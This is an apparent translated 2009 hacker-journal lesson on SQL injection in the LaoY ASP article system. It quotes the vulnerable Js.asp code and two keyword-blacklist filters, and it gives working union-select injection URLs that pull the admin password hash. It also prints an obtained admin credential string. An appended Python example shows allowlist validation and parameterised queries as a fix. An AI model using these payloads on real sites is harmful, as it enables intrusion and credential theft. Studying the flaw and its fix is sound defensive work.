Hacker Defence (黑客防线): seeking breakthroughs in the unity of opposites between attack and defence. A hacker-technology journal founded in 2001.


[Lesson 34] Vulnerability Hunting: Bypassing LaoY and Continuing the Injection

Published by: 黑客防线 (Hacker Defence)
Published: 2009-7-5 0:50:21
Bypassing LaoY's Anti-Injection and Continuing to Inject
Author: 幻泉[B.S.N]

Back at the Dragon Boat Festival I released a LaoY injection vulnerability for the many members of Hacker Defence. LaoY later patched it, but was the patch really perfect? Of course not.
Let's first review the Dragon Boat Festival vulnerability. Js.asp:
If CheckStr(Request("ClassNo")) <> "" then
    ClassNo = split(CheckStr(Request("ClassNo")),"|")
    ' Fetch the variable and filter it with CheckStr (which does not seem to take effect), then split it into an array
    on error resume next
    NClassID = LaoYRequest(ClassNo(0))
    NClassID1 = LaoYRequest(ClassNo(1))
    ' Take array elements 1 and 2 and apply integer filtering. No vulnerability here
End if

num = LaoYRequest(request.querystring("num"))    ' num must be >= 1 here
.......
set rs=server.createObject("Adodb.recordset")
sql = "Select top "& num &" ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0"

If NclassID<>"" and NclassID1="" then
    If Yao_MyID(NclassID)="0" then
        SQL=SQL&" and ClassID="&NclassID&""
    else
        MyID = Replace(""&Yao_MyID(NclassID)&"","|",",")
        SQL=SQL&" and ClassID in ("&MyID&")"    ' in(1,2,3)
    End if
elseif NclassID<>"" and NclassID1<>"" then
    MyID = Replace(""&Request("ClassNo")&"","|",",")    ' every | is replaced with ,   1|1|2|2|2   myid=1,1,2,2,2
    SQL=SQL&" and ClassID in ("&MyID&")"    ' in(1,1,2) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1)
    ' The problem is here: ClassNo is written into the query without any further filtering
End if

select case topType
    case "new" sql=sql&" order by DateAndTime desc,ID desc"
    case "hot" sql=sql&" order by hits desc,ID desc"
    case "IsHot" sql=sql&" and IsHot = 1 order by ID desc"
end select

set rs = conn.execute(sql)
if rs.bof and rs.eof then
    str=str+"没有符合条件的文章"
........
The code above is annotated; the main point is that ClassNo only passes through the CheckStr filter and then has "|" converted to ",". Note the order of the filtering here, because we will need it later: the first filter is the CheckStr function, and only then does Replace convert "|" to ",". Now let's look at the CheckStr function itself.
function CheckStr(str)
    CheckStr=replace(replace(replace(replace(str,"<","&lt;"),">","&gt;"),chr(13),"")," ","")
    CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","")
    CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"")
    CheckStr=replace(replace(replace(replace(replace(CheckStr,"*",""),"=",""),"or",""),"mid",""),"count","")
end function
All this does is replace a handful of common keywords with empty strings. With that, we can construct the injection code. At the time I had already published the injection code for retrieving the password:
js.asp?num=1&ClassNo=1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1
With the preamble out of the way, on to our main topic. The latest LaoY version is dated June 16. Let's see how the latest version prevents this injection. The vulnerable Js.asp file was not changed by a single character; what changed is the CheckStr function, as follows:
function CheckStr(str)
    CheckStr=replace(replace(replace(replace(str,"<","&lt;"),">","&gt;"),chr(13),"")," ","")
    CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","")
    CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"")
    CheckStr=replace(replace(replace(replace(CheckStr,"*",""),"=",""),"mid",""),"count","")
    CheckStr=replace(replace(replace(replace(CheckStr,"%",""),",",""),"union",""),"where","")
end function
If you have seen the Joekoe (乔客) vulnerability from long ago, you may already have some idea about this kind of code.

The administrator account and MD5-hashed password have been obtained:
1|1|2)union%20select%201,admin_pass,3,4,5,6,7,8,9%20from%20yao_admin%20where%20id%20in(1


LaoYAdmin=UserName=admin&UserPass=32f297a57a5a743894&UserID=1
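As an added defensive counterpart to the Js.asp code and the two CheckStr versions discussed above (this is example code written for this page, not the LaoY project's code and not part of the original article), the following Python shows how the ClassNo and num parameters could be accepted without a keyword blacklist at all: every pipe-separated element of ClassNo must be a plain integer, num must be an integer of at least 1, and the query is built with placeholders so no user-supplied characters ever enter the SQL text. The table and rows are a constructed SQLite stand-in that mirrors only the column names shown in the article, and SQLite's LIMIT stands in for the page's "Select top". The article's own payload against the old Js.asp appears only as an input the validator must refuse.

```python
import re
import sqlite3

# Constructed sample inputs (not taken from real traffic).
LEGIT_CLASSNO = "1|2|3"
# The article's payload for the old Js.asp, used here only as an input to be rejected.
INJECTED_CLASSNO = "1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1"

# The only shape a class id may legitimately have: 1 to 9 decimal digits.
INT_RE = re.compile(r"[0-9]{1,9}")


def parse_class_ids(classno: str) -> list:
    """Allowlist parser for ClassNo: split on '|' and require every element to be a
    plain integer. Anything else is refused outright instead of being 'cleaned'."""
    ids = []
    for part in classno.split("|"):
        if not INT_RE.fullmatch(part):
            raise ValueError(f"ClassNo element is not an integer: {part!r}")
        ids.append(int(part))
    return ids


def parse_num(num: str, max_rows: int = 100) -> int:
    """num must be an integer >= 1; it is also capped to bound the result size."""
    if not INT_RE.fullmatch(num) or int(num) < 1:
        raise ValueError(f"num must be an integer >= 1: {num!r}")
    return min(int(num), max_rows)


def build_query(num: int, class_ids: list):
    """Build the article-list query with placeholders instead of string concatenation.
    The IN list is sized from the count of validated integers, so the SQL text itself
    never contains anything the client sent."""
    placeholders = ",".join("?" * len(class_ids))
    sql = ("SELECT ID, Title, Author, ClassID FROM Yao_Article "
           f"WHERE yn = 0 AND ClassID IN ({placeholders}) "
           "ORDER BY DateAndTime DESC, ID DESC LIMIT ?")
    return sql, (*class_ids, num)


def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the LaoY database (constructed schema and rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Yao_Article (ID INTEGER, Title TEXT, Author TEXT, "
                 "ClassID INTEGER, DateAndTime TEXT, yn INTEGER)")
    rows = [
        (1, "first", "a", 1, "2009-06-01", 0),
        (2, "second", "b", 2, "2009-06-02", 0),
        (3, "third", "c", 3, "2009-06-03", 0),
        (4, "deleted", "d", 1, "2009-06-04", 1),   # yn = 1: excluded by the WHERE clause
        (5, "other class", "e", 9, "2009-06-05", 0),  # ClassID 9: not requested
    ]
    conn.executemany("INSERT INTO Yao_Article VALUES (?,?,?,?,?,?)", rows)
    return conn


def list_articles(conn: sqlite3.Connection, num: str, classno: str) -> list:
    """Handler equivalent of the Js.asp branch: returns the IDs of matching articles,
    or raises ValueError before any SQL is built when the input fails validation."""
    ids = parse_class_ids(classno)
    n = parse_num(num)
    sql, params = build_query(n, ids)
    return [row[0] for row in conn.execute(sql, params)]


def handles_payload_safely(conn: sqlite3.Connection, classno: str) -> bool:
    """True when the request is refused by validation and no query is executed."""
    try:
        list_articles(conn, "1", classno)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = demo_db()
    print(list_articles(db, "10", LEGIT_CLASSNO))        # [3, 2, 1]
    print(handles_payload_safely(db, INJECTED_CLASSNO))  # True
```

The difference in approach matters more than the language. CheckStr tries to enumerate bad substrings, so any substring the list omits is accepted and each revision of the list is only as complete as its author's imagination. An allowlist that states the one shape the parameter can legitimately have (digits separated by "|") has nothing to enumerate, and placeholders keep even a validated value out of the SQL text.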